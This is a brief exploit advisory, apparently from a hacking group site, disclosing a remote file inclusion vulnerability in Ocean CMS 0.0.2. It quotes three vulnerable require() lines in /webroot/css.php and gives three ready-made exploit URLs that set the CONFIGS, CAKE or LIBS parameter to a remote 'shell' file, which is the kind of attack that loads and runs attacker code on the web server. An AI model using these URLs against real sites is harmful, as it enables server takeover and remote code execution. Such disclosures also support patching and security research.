++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + Ocean CMS 0.0.2 Remote File Inclusion Vulnerability + + + + Discovered by Cru3l.b0y + + + + WwW.DeltaHacking.Net + + + + + + + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ################################################################################################### AUTHOR : Cru3l.b0y APPLICATION : Ocean CMS VERSION : 0.0.2 DOWNLOAD : http://cakeforge.org/frs/download.php/113/OceanCMS.tar.bz VENDOR : http://cakeforge.org/ ################################################################################################### Vulnerable Code : ################################################################################################### /webroot/css.php 34 require(CONFIGS.'paths.php'); 35 require(CAKE.'basics.php'); 36 require(LIBS.'folder.php'); [+]Exploit: http://[t4rg3t]/[p4th]/webroot/css.php?CONFIGS=shell [+]Exploit: http://[t4rg3t]/[p4th]/webroot/css.php?CAKE=shell [+]Exploit: http://[t4rg3t]/[p4th]/webroot/css.php?LIBS=shell ###################################################################################################